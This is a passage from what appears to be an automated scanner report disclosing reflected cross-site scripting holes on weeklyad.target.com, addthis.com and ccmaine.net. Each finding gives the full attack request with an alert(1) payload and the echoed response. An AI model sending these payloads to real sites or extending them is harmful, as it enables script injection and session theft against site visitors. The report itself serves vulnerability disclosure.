User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:48:35 GMT
Server: Apache/2.2
Content-Length: 353
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=756
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 12 Jan 2011 03:48:35 GMT

<!-- MAC-AD STATUS: COULD NOT MAP BRAND="" SITE="" NCAT="" PTNR="2" TO MA
...[SNIP]...

3.10. http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://weeklyad.target.com
Path:	/target/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e73d"-alert(1)-"5a488d4c1ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /target/default.aspx?4e73d"-alert(1)-"5a488d4c1ea=1 HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Cache-Control: private, max-age=0
Expires: Wed, 12 Jan 2011 04:17:13 GMT
Date: Wed, 12 Jan 2011 04:17:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<html lang
...[SNIP]...
om";
var sl_basedir = "target";
var sl_moviepath = "flash/target/target?ver=090326";
var sl_campaignId = "a4776711305a3c4b";
var sl_querystring = "action=entryflash&4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_usedByIframe = false;
var sl_action = "entryflash";
var sl_fullscreenQS = "4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_sweepstakes = "false";
</script>
...[SNIP]...

3.11. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d881a<script>alert(1)</script>eb1d0c27278 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpd881a<script>alert(1)</script>eb1d0c27278 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3pg3je3annhr4isubu49p9srm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpd881a<script>alert(1)</script>eb1d0c27278</strong>
...[SNIP]...

3.12. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b72"-alert(1)-"9394725b754 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.phpc1b72"-alert(1)-"9394725b754 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rs4f354lgh6a3mh8li873raet1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpc1b72"-alert(1)-"9394725b754";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.13. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a1a"-alert(1)-"c8ee54f2b37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php/20a1a"-alert(1)-"c8ee54f2b37 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/20a1a"-alert(1)-"c8ee54f2b37";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.14. http://www.ccmaine.net/AboutUs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea was submitted in the REST URL parameter 1. This input was echoed as 4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUs4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:27 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d32bdc983db958f343551d76ca24711c
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for AboutUs4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea (RSS)" href="http://www.ccmaine.net/AboutUs4f2d8">
...[SNIP]...

3.15. http://www.ccmaine.net/AboutUs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 was submitted in the REST URL parameter 1. This input was echoed as b5fc4<img src=a onerror=alert(1)>48948eeca42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUsb5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:25 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: e9e010a376fd609f56f2d58330844155
Content-Length: 3256
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : AboutUsb5fc4<img src=a onerror=alert(1)>48948eeca42</h2>
...[SNIP]...

3.16. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 was submitted in the REST URL parameter 1. This input was echoed as 3295c"><img src=a onerror=alert(1)>e19de808de7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicy3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:42 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 6629376caca2d486b9c0b94d4f7b4371
Content-Length: 3304
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for BillingPolicy3295c"><img src=a onerror=alert(1)>e19de808de7 (RSS)" href="http://www.ccmaine.net/BillingPolicy3295c">
...[SNIP]...

3.17. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 was submitted in the REST URL parameter 1. This input was echoed as dc613<img src=a onerror=alert(1)>3347e2cf2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicydc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25e80420e6d313e4fbe6ce792e29fa76
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : BillingPolicydc613<img src=a onerror=alert(1)>3347e2cf2c2</h2>
...[SNIP]...

3.18. http://www.ccmaine.net/ContactUs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 was submitted in the REST URL parameter 1. This input was echoed as 34738"><img src=a onerror=alert(1)>df6b78b1cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 3c7274efcc40f20baab312a1024e600f
Content-Length: 3279
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ContactUs34738"><img src=a onerror=alert(1)>df6b78b1cd3 (RSS)" href="http://www.ccmaine.net/ContactUs34738">
...[SNIP]...

3.19. http://www.ccmaine.net/ContactUs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f was submitted in the REST URL parameter 1. This input was echoed as 516ec<img src=a onerror=alert(1)>286ed71c31f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: ec91a7e91eec3db7c10f0659d756670f
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : ContactUs516ec<img src=a onerror=alert(1)>286ed71c31f</h2>
...[SNIP]...

3.20. http://www.ccmaine.net/HomePage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/HomePage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d was submitted in the REST URL parameter 1. This input was echoed as f982c<img src=a onerror=alert(1)>75affe6a42d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePagef982c<img%20src%3da%20onerror%3dalert(1)>75affe6a42d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:11 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0909425b1db91ebe3d20340a0cd3ebf6
Content-Length: 3261
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : HomePagef982c<img src=a onerror=alert(1)>75affe6a42d</h2>
...[SNIP]...

3.21. http://www.ccmaine.net/HomePage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/HomePage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 was submitted in the REST URL parameter 1. This input was echoed as 47337"><img src=a onerror=alert(1)>61bf246dcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /HomePage47337"><img%20src%3da%20onerror%3dalert(1)>61bf246dcf4 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Mon, 10 Jan 2011 18:20:03 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: dc98c484eb8016411a263012303b03fc
Content-Length: 3273
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for HomePage47337"><img src=a onerror=alert(1)>61bf246dcf4 (RSS)" href="http://www.ccmaine.net/HomePage47337">
...[SNIP]...

3.22. http://www.ccmaine.net/ServiceArea [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 was submitted in the REST URL parameter 1. This input was echoed as f1d93<img src=a onerror=alert(1)>1e652f7eb00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceAreaf1d93<img%20src%3da%20onerror%3dalert(1)>1e652f7eb00 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0f44546dae010234136c69ab529c529c
Content-Length: 3280
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : ServiceAreaf1d93<img src=a onerror=alert(1)>1e652f7eb00</h2>
...[SNIP]...

3.23. http://www.ccmaine.net/ServiceArea [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ServiceArea

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 was submitted in the REST URL parameter 1. This input was echoed as 5a14d"><img src=a onerror=alert(1)>5bb3ad33910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceArea5a14d"><img%20src%3da%20onerror%3dalert(1)>5bb3ad33910 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceOfferings
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 01a1cb204eb68f3b229258b88c224a64
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceArea5a14d"><img src=a onerror=alert(1)>5bb3ad33910 (RSS)" href="http://www.ccmaine.net/ServiceArea5a14d">
...[SNIP]...

3.24. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ServiceOfferings

Issue detail

